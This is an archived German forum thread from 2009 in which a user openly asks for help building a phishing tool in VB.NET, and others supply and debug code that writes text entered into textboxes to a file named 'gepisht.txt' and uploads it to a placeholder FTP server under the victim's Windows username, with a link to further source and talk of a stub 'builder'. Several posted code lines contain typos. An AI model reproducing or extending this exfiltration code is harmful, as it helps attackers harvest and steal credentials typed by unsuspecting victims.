PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [s] Tutorial FTP Upload (VB.NET)



HawK
19.05.2009, 18:59
wie lade ich Texte aus Textboxen als .txt File auf nen FTP hoch ???

und wie erstelle ich ne .exe mit ner .exe :D also in VB

BTW: Es soll ein Phishing Tool Werden ;)

inmate
19.05.2009, 19:04
also zu 1 :
dim save as string = textbox1.txt & textbox2.txt
io.file.create("C:\gepisht.txt",safe)
my.computer.network.uploadfile.("C:\gepisht.txt",ftp://deinftp.bplaced.net" & "/" & environment.username & ".txt","deinusername","deinpass")

und du musst dir mal das builder tut von the papst angucken sollte dir helfen ;)
edit:

zu 1 das kannse auch mit nem streamwriter machen, aber die methode is jetzt die die mir grade einfiel ^^ kanns mich ja mal in ICQ adden wenne noch fragen hast


EDIT:///
http://rapidshare.com/files/234889643/4hawk88.zip.html

so hier de4r source ;)
ist zwar klein hab aber alles erwähnt ausser den builder , das war mir jetzt zu viel arbeit :D

KDBFame
18.06.2009, 14:03
Und das funzt auch?

VooDoo666
18.06.2009, 14:17
Ausprobieren!
Google hilft übrigens ab.
Und das ist nicht der erste Thread zum FTP upload.

KDBFame
18.06.2009, 14:49
das geht nicht kommt immer ein error!!!!

in dieser zeile:
my.computer.network.uploadfile.("C:\gepisht.txt",f tp://deinftp.bplaced.net" & "/" & environment.username & ".txt","deinusername","deinpass")

was ist daran falsch?

DK007
18.06.2009, 14:56
Welcher Fehler denn?

Sawyer
18.06.2009, 14:57
Im Prinzip ist die Zeile Völlig richtig , es kann also nur an 3 Sachen liegen

1. Die Server und Login Daten sind nicht richtig
2. Die Datei Existiert nicht
3. Die Verbindung zum Internet wird geblockt

allerdings sollte eine etwas aussagekräftigere Fehlermeldung erscheinen , anhand man erkennen könnte wodurch der Fehler entstanden ist

MfG

KDBFame
18.06.2009, 14:57
my.computer.network.uploadfile

wird als fehler angezeigt.

da steht: InvalidCastException oder so

PS: Bin sozusagen ein VB Noob! ;)

Sawyer
18.06.2009, 15:01
My.Computer.Network.UploadFile("C:\gepisht.txt", "ftp://deinftp.bplaced.net" & "/" & Environment.UserName & ".txt", "deinusername", "deinpass")Wie gesagt der Code an sich ist Völlig korrekt , und das es als Fehlerangezeigt wird , mag durchaus sein , allerdings sollte ein Fenstern erscheinen mit einer richtigen Fehlermeldung

Ohne diese zu kennen kann man dir nicht helfen.

edit:
mir sagt dieser fehler ehrlich gesagt nichts , normal dürfte er gar nicht entstehen oO

MfG

KDBFame
18.06.2009, 15:03
Ich hab den Fehler entdeckt!!!
Die Groß und Kleinschreibung!!
Hätte nicht gedacht das das eine bedeutung hätte?!?!


Thx an alle!!!

Sawyer
18.06.2009, 15:09
Hätte nicht gedacht das das eine bedeutung hätte?!?!Naja wie alle modernen Sprachen ist auch vb.net Case sensitive
Allerdings verwundert mich es auch etwas , denn eigentlich müsste der Compiler Rechtschreibfehler automatisch Korrigieren

naja zumindest wurde dein Fehler behoben ^^;

MfG